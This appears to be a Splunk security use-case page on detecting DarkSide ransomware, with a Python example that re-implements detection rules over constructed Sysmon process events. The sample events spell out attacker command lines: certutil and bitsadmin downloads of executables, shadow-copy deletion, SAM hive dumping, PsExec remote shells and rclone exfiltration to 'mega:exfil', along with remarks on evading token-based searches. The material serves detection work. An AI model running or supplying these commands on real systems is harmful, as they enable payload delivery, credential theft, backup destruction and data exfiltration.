Detecting DarkSide ransomware
DarkSide ransomware drops a ransom note on each encrypted machine that contains a URI personalized to the victim, pointing to the attackers' site where the data stolen before encryption is held for leaking. The payload leaves machines at a minimum level of operation: enough to browse the attackers' websites and obtain the information needed to pay them, and little else.
You are an analyst responsible for your organization's overall security posture. You need to be able to detect and investigate unusual activities that might relate to DarkSide ransomware, and these searches help you to do that.
Required data
How to use Splunk software for this use case
- Attempted credential dump from registry via reg exe
- BITSAdmin download file
- CertUtil download with URLCache and split arguments
- CertUtil download with VerifyCtl and split arguments
- Delete ShadowCopy with PowerShell
- Detect PsExec with accepteula flag
- Detect RClone command line usage
- Detect renamed PSExec
- Detect renamed RClone
- Extraction of registry hives
- SLUI run as elevated
- SLUI spawning a process
- Windows Bitsadmin download file
- Windows CertUtil URLCache download
- Windows CertUtil VerifyCtl download
The following searches require Sysmon:
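As an added example, not part of the original page and not the ESCU searches themselves, the following Python approximates the matching logic of most of the searches listed above and runs it over constructed Sysmon Event ID 1 (process creation) records. The predicates are simplified from the published searches; the paths, hostnames and IP addresses in the sample records are made up, and the PE `OriginalFileName` values used to catch renamed binaries (`psexec.c` for PsExec, `rclone.exe` for RClone) are what those tools report. "SLUI run as elevated" (which needs the Sysmon `IntegrityLevel` field) and the "Windows ..." variants of the Bitsadmin and CertUtil searches are not encoded separately.

```python
"""Simplified re-implementation of the DarkSide detections listed above,
run over constructed Sysmon Event ID 1 (process creation) records.
Added example: predicates approximate the ESCU searches, not the searches themselves."""
from dataclasses import dataclass
from typing import Callable, Dict, List


@dataclass
class ProcEvent:
    image: str               # Sysmon Image (full path of the new process)
    original_file_name: str  # Sysmon OriginalFileName (from the PE version resource)
    command_line: str        # Sysmon CommandLine
    parent_image: str = ""   # Sysmon ParentImage

    @property
    def name(self) -> str:   # process_name in the Endpoint data model
        return self.image.rsplit("\\", 1)[-1].lower()

    @property
    def parent_name(self) -> str:
        return self.parent_image.rsplit("\\", 1)[-1].lower()

    @property
    def cmd(self) -> str:    # case-folded, space-padded for whole-token matches
        return f" {self.command_line.lower()} "


PSEXEC_NAMES = ("psexec.exe", "psexec64.exe")
HIVE_PATHS = ("\\sam", "\\security", "\\system")  # HKLM hives holding credential material
RCLONE_VERBS = ("copy", "sync", "move", "lsd")

# Search name -> predicate over one process-creation event.
RULES: Dict[str, Callable[[ProcEvent], bool]] = {
    "Attempted credential dump from registry via reg exe": lambda e:
        e.name == "reg.exe" and (" save " in e.cmd or " export " in e.cmd)
        and any(h in e.cmd for h in HIVE_PATHS),
    "BITSAdmin download file": lambda e:
        e.name == "bitsadmin.exe" and ("/transfer" in e.cmd or "/download" in e.cmd),
    "CertUtil download with URLCache and split arguments": lambda e:
        e.name == "certutil.exe" and "urlcache" in e.cmd and "split" in e.cmd,
    "CertUtil download with VerifyCtl and split arguments": lambda e:
        e.name == "certutil.exe" and "verifyctl" in e.cmd and "split" in e.cmd,
    "Delete ShadowCopy with PowerShell": lambda e:
        e.name in ("powershell.exe", "pwsh.exe") and "win32_shadowcopy" in e.cmd
        and ("delete" in e.cmd or "remove-wmiobject" in e.cmd),
    "Detect PsExec with accepteula flag": lambda e:
        e.name in PSEXEC_NAMES and "accepteula" in e.cmd,
    "Detect RClone command line usage": lambda e:
        e.name == "rclone.exe" and any(f" {v} " in e.cmd for v in RCLONE_VERBS),
    # Renaming the binary changes Image but not the PE's OriginalFileName.
    "Detect renamed PSExec": lambda e:
        e.original_file_name.lower() == "psexec.c" and e.name not in PSEXEC_NAMES,
    "Detect renamed RClone": lambda e:
        e.original_file_name.lower() == "rclone.exe" and e.name != "rclone.exe",
    "Extraction of registry hives": lambda e:
        e.name in ("reg.exe", "cmd.exe") and " save " in e.cmd
        and any(h in e.cmd for h in HIVE_PATHS),
    "SLUI spawning a process": lambda e:
        e.parent_name == "slui.exe" and e.name in ("cmd.exe", "powershell.exe"),
}

# Constructed sample records (made-up hosts, paths and addresses), not real telemetry.
SAMPLE_EVENTS: List[ProcEvent] = [
    ProcEvent(r"C:\Windows\Temp\ps.exe", "psexec.c",
              r"ps.exe -accepteula \\FS01 -s cmd.exe", r"C:\Windows\System32\cmd.exe"),
    ProcEvent(r"C:\Windows\System32\certutil.exe", "CertUtil.exe",
              r"certutil.exe -urlcache -split -f http://198.51.100.7/p.exe C:\Users\Public\p.exe"),
    ProcEvent(r"C:\Windows\System32\bitsadmin.exe", "bitsadmin.exe",
              r"bitsadmin.exe /transfer job /download /priority high http://198.51.100.7/a.exe C:\Users\Public\a.exe"),
    ProcEvent(r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe", "PowerShell.EXE",
              'powershell.exe -nop -c "Get-WmiObject Win32_Shadowcopy | ForEach-Object { $_.Delete() }"'),
    ProcEvent(r"C:\Windows\System32\reg.exe", "reg.exe",
              r"reg.exe save HKLM\SAM C:\Users\Public\sam.hiv"),
    ProcEvent(r"C:\Windows\System32\cmd.exe", "Cmd.Exe",
              r"cmd.exe /c whoami", r"C:\Windows\System32\slui.exe"),
    ProcEvent(r"C:\ProgramData\svchost.exe", "rclone.exe",
              r"svchost.exe copy C:\Finance mega:exfil --transfers 32"),
    ProcEvent(r"C:\Tools\rclone.exe", "rclone.exe",
              r"rclone.exe sync C:\Finance mega:exfil --transfers 32"),
    ProcEvent(r"C:\Tools\PsExec.exe", "psexec.c",
              r"PsExec.exe -accepteula \\FS01 -s cmd.exe"),
    ProcEvent(r"C:\Windows\System32\certutil.exe", "CertUtil.exe",
              r"certutil.exe -verify C:\certs\server.cer"),          # benign
    ProcEvent(r"C:\Windows\System32\reg.exe", "reg.exe",
              r"reg.exe query HKLM\Software\Microsoft\Windows NT"),  # benign
]


def evaluate(events: List[ProcEvent]) -> List[List[str]]:
    """For each event, the sorted names of the searches that would fire on it."""
    return [sorted(n for n, hit in RULES.items() if hit(e)) for e in events]


def hits_by_search(events: List[ProcEvent]) -> Dict[str, int]:
    """How many of the events each search caught, for a quick coverage view."""
    counts = {name: 0 for name in RULES}
    for names in evaluate(events):
        for n in names:
            counts[n] += 1
    return counts


if __name__ == "__main__":
    for e, names in zip(SAMPLE_EVENTS, evaluate(SAMPLE_EVENTS)):
        print(f"{e.name:<16} {e.original_file_name:<14} -> {names or ['(no match)']}")
```

The first and seventh records show why the "renamed" searches exist alongside the name-based ones: a PsExec copied to `ps.exe` still carries `accepteula` on its command line but is missed by the accepteula search, which keys on `process_name`, and is only caught through `OriginalFileName`. The same split applies to RClone. Searches that key on command-line tokens are cheap to evade by changing the token; searches that key on PE metadata are not.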
Next steps
In addition, these Splunk resources might help you understand and implement this use case:
- Use case: Detecting ransomware attacks
- Use case: Investigating ransomware attacks
- E-book: Ransomware, malware and cyberthreats
- Webinar: Detection of ransomware and prevention strategies
- Blog: Operationalize ransomware detections quickly and easily with Splunk